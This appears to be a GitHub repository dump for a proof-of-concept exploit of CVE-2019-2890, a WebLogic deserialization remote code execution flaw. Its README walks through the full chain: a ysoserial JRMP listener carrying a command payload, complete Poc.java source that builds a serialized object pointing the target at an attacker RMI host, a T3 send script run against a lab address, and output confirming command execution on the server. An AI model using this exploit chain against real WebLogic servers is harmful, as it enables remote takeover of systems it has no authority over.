├── CVE-2019-2890.gif ├── README.md └── security.png /CVE-2019-2890.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2019-2890/8615b9d53b8278a8696b8075680958d8bd56a65e/CVE-2019-2890.gif -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2019-2890 WebLogic 反序列化RCE漏洞 2 | 3 | ![](./CVE-2019-2890.gif) 4 | 5 | ## 0x01 Download SerializedSystemIni.dat 6 | 7 | ` /root/Oracle/Middleware/user_projects/domains/base_domain/security` 8 | 9 | ``` 10 | root@159475444bab:~/Oracle/Middleware/user_projects/domains/base_domain/security# 11 | 12 | md5sum SerializedSystemIni.dat 13 | 14 | a50f1784f1f5b12cccb8b231d6b36223 SerializedSystemIni.dat 15 | 16 | ``` 17 | ## 0x02 create security 18 | ![](./security.png) 19 | 20 | ``` 21 | ale@Pentest ~/Pentester/CVE-2019-2890/security md5sum SerializedSystemIni.dat 22 | 23 | a50f1784f1f5b12cccb8b231d6b36223 SerializedSystemIni.dat 24 | ``` 25 | ## 0x03 Run Java Rmi 26 | 27 | `java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "touch /tmp/cve-2019-2890"` 28 | 29 | 30 | ## 0x04 Run Poc.java Get Poc.ser 31 | 32 | #### Poc.java 33 | ``` 34 | package weblogic.wsee.jaxws.persistence; 35 | 36 | import sun.rmi.server.UnicastRef; 37 | import sun.rmi.transport.LiveRef; 38 | import sun.rmi.transport.tcp.TCPEndpoint; 39 | import weblogic.kernel.KernelStatus; 40 | 41 | import java.io.FileOutputStream; 42 | import java.io.IOException; 43 | import java.io.ObjectOutputStream; 44 | import java.lang.reflect.Proxy; 45 | import java.rmi.registry.Registry; 46 | import java.rmi.server.ObjID; 47 | import java.rmi.server.RemoteObjectInvocationHandler; 48 | import java.util.Random; 49 | 50 | public class Poc { 51 | public static Registry getObject(String command) throws Exception { 52 | int sep = command.indexOf(58); 53 | String host; 54 | int port; 55 | if (sep < 0) { 56 | port = (new Random()).nextInt(65535); 57 | host = command; 58 | } else { 59 | host = command.substring(0, sep); 60 | port = Integer.valueOf(command.substring(sep + 1)); 61 | } 62 | 63 | ObjID id = new ObjID((new Random()).nextInt()); 64 | TCPEndpoint te = new TCPEndpoint(host, port); 65 | UnicastRef ref = new UnicastRef(new LiveRef(id, te, false)); 66 | RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref); 67 | Registry proxy = (Registry)Proxy.newProxyInstance(ysoserial.payloads.JRMPClient.class.getClassLoader(), new Class[]{Registry.class}, obj); 68 | return proxy; 69 | } 70 | public static void main(String[] args) throws IOException{ 71 | System.setProperty("com.bea.core.internal.client","true"); 72 | //KernelStatus.setIsServer(true); 73 | PersistentContext pc = new PersistentContext(null,null,null,null,null); 74 | FileOutputStream fos = new FileOutputStream("poc.ser"); 75 | ObjectOutputStream objectOutputStream = new ObjectOutputStream(fos); 76 | objectOutputStream.writeObject(pc); 77 | objectOutputStream.close(); 78 | } 79 | } 80 | 81 | ``` 82 | 83 | #### set rmi addresss in PersistentContext.java 84 | 85 | ``` 86 | private void writeSubject(ObjectOutputStream var1) throws IOException { 87 | ByteArrayOutputStream var2 = new ByteArrayOutputStream(); 88 | ObjectOutputStream var3 = new ObjectOutputStream(var2); 89 | 90 | //if (SubjectManager.getSubjectManager().isKernelIdentity(this._subject)) { 91 | // AuthenticatedSubject var4 = (AuthenticatedSubject)SubjectManager.getSubjectManager().getAnonymousSubject(); 92 | // var3.writeObject(var4); 93 | //} else { 94 | // var3.writeObject(this._subject); 95 | //} 96 | try { 97 | var3.writeObject(Poc.getObject("10.10.20.166:8000")); 98 | } catch (Exception e) { 99 | e.printStackTrace(); 100 | } 101 | ``` 102 | 103 | ## 0x05 Send Exp 104 | 105 | ``` 106 | ale@Pentest ~/Pentester/CVE-2019-2890 python weblogic.py 10.10.20.166 7001 poc.ser 107 | 108 | [+] Connecting to 10.10.20.166 port 7001 109 | sending "t3 12.2.1 110 | AS:255 111 | HL:19 112 | MS:10000000 113 | PU:t3://us-l-breens:7001 114 | 115 | " 116 | received "HELO" 117 | [+] Sending payload... 118 | received ":10.3.6.0.false 119 | AS:2048 120 | HL:19 121 | 122 | " 123 | ``` 124 | #### rmi connect 125 | ``` 126 | root@kali:~# java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "touch /tmp/cve-2019-2890" 127 | * Opening JRMP listener on 8000 128 | Have connection from /172.18.0.2:53544 129 | Reading message... 130 | Is DGC call for [[0:0:0, 274645388], [0:0:0, 1496404241]] 131 | Sending return with payload for obj [0:0:0, 2] 132 | Closing connection 133 | ``` 134 | 135 | #### Exp Success 136 | 137 | ``` 138 | root@159475444bab:~/Oracle/Middleware/user_projects/domains/base_domain/security# ls /tmp 139 | root@159475444bab:~/Oracle/Middleware/user_projects/domains/base_domain/security# ls /tmp 140 | cve-2019-2890 141 | root@159475444bab:~/Oracle/Middleware/user_projects/domains/base_domain/security# 142 | ``` 143 | 144 | ## 参考链接 145 | 146 | https://github.com/SukaraLin/CVE-2019-2890 147 | -------------------------------------------------------------------------------- /security.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jas502n/CVE-2019-2890/8615b9d53b8278a8696b8075680958d8bd56a65e/security.png --------------------------------------------------------------------------------